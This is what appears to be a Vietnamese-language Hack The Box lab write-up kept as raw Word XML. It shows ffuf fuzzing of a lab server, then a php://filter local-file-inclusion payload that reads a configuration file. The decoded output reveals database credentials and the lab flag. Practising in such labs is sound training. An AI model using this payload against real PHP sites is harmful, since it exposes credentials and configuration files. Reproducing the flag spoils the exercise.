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D491A" w14:textId="6A8A8E19" w:rsidR="00F83243" w:rsidRDefault="00FA5883" w:rsidP="00FA5883">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5883">
        <w:t>Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124EA969" w14:textId="60911A95" w:rsidR="00FA5883" w:rsidRDefault="00FA5883" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng Fuzz để tìm các file php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12995852" w14:textId="0749ADDB" w:rsidR="00E420FC" w:rsidRDefault="00E420FC" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3BEC7" w14:textId="08A5D066" w:rsidR="00E420FC" w:rsidRDefault="00E420FC" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E420FC">
        <w:t xml:space="preserve">ffuf -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00124225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://94.237.54.116:45907/FUZZ.php -w /root/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33B234C6" w14:textId="66139A95" w:rsidR="00E420FC" w:rsidRDefault="00E420FC" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B88E4C" w14:textId="2D4D65E8" w:rsidR="00E420FC" w:rsidRDefault="00E420FC" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4B3D4A" wp14:editId="2EEC772E">
            <wp:extent cx="5943600" cy="2351405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155251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15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A3DC" w14:textId="405A7080" w:rsidR="00BB1C94" w:rsidRDefault="00BB1C94" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689AAEF9" wp14:editId="6C516822">
            <wp:extent cx="5943600" cy="633730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174035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59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7428" w14:textId="6F5A6C4A" w:rsidR="00BB1C94" w:rsidRDefault="00BB1C94" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ta tìm được file configure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EAD59" w14:textId="539B5F27" w:rsidR="00BB1C94" w:rsidRDefault="00BB1C94" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dùng câu lệnh để đọc file configure với kết quả đầu ra là chuỗi base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49911FEA" w14:textId="37D9255C" w:rsidR="00A27D5C" w:rsidRDefault="00A27D5C" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FA6BD" w14:textId="3E78F7CC" w:rsidR="00A27D5C" w:rsidRDefault="00A27D5C" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00124225">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://94.237.54.116:45907/index.php?language=php://filter/read=convert.base64-encode/resource=configure</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42E66AC2" w14:textId="3B315829" w:rsidR="00A27D5C" w:rsidRDefault="00A27D5C" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6B2AB" w14:textId="4CD7F0A1" w:rsidR="00A27D5C" w:rsidRDefault="00A27D5C" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13373C3D" wp14:editId="74214945">
            <wp:extent cx="5943600" cy="1872615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="659614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140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A4CB" w14:textId="41DE0410" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ta thu được đoạn base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F829D03" w14:textId="08B5D0F7" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C3953A" w14:textId="2F00B85A" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C12483">
        <w:t>PD9waHAKCmlmICgkX1NFUlZFUlsnUkVRVUVTVF9NRVRIT0QnXSA9PSAnR0VUJyAmJiByZWFscGF0aChfX0ZJTEVfXykgPT0gcmVhbHBhdGgoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSkgewogIGhlYWRlcignSFRUUC8xLjAgNDAzIEZvcmJpZGRlbicsIFRSVUUsIDQwMyk7CiAgZGllKGhlYWRlcignbG9jYXRpb246IC9pbmRleC5waHAnKSk7Cn0KCiRjb25maWcgPSBhcnJheSgKICAnREJfSE9TVCcgPT4gJ2RiLmlubGFuZWZyZWlnaHQubG9jYWwnLAogICdEQl9VU0VSTkFNRScgPT4gJ3Jvb3QnLAogICdEQl9QQVNTV09SRCcgPT4gJ0hUQntuM3Yzcl8kdDByM19wbDQhbnQzeHRfY3IzZCR9JywKICAnREJfREFUQUJBU0UnID0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132437DA" w14:textId="3339BCA3" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA837A" w14:textId="14AACBA3" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Giải mã đoạn base64 thu được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488059B" w14:textId="4F132C48" w:rsidR="00C12483" w:rsidRDefault="00C12483" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9695F5" wp14:editId="53A35408">
            <wp:extent cx="5943600" cy="1177290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="6275284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2849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9186" w14:textId="187FAF9F" w:rsidR="00781649" w:rsidRDefault="00781649" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00781649">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781649">
        <w:t>HTB{n3v3r_$t0r3_pl4!nt3xt_cr3d$}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EEC68" w14:textId="77777777" w:rsidR="00FA5883" w:rsidRDefault="00FA5883" w:rsidP="00FA5883">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FA5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860B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A20C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3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43"/>
    <w:rsid w:val="00781649"/>
    <w:rsid w:val="009348CF"/>
    <w:rsid w:val="00A27D5C"/>
    <w:rsid w:val="00BB1C94"/>
    <w:rsid w:val="00C12483"/>
    <w:rsid w:val="00E420FC"/>
    <w:rsid w:val="00F83243"/>
    <w:rsid w:val="00FA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8004"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C6917307-2619-4864-86CD-0BF78829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2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20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4.237.54.116:45907/index.php?language=php://filter/read=convert.base64-encode/resource=configu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94.237.54.116:45907/FUZZ.php%20-w%20/root/SecLists/Discovery/Web-Content/directory-list-2.3-small.tx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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-01T14:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-01T14:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>